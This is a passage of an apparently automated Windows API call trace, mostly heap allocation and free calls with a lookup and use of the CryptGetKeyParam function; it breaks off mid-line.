[0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0097.593] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0097.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0097.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.594] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0097.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0097.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0097.595] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0097.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0097.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0097.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0097.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0097.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0097.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0097.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0097.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0097.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0097.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0097.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.601] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0097.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0097.782] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e28c0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28c0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0097.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0097.784] HeapFree 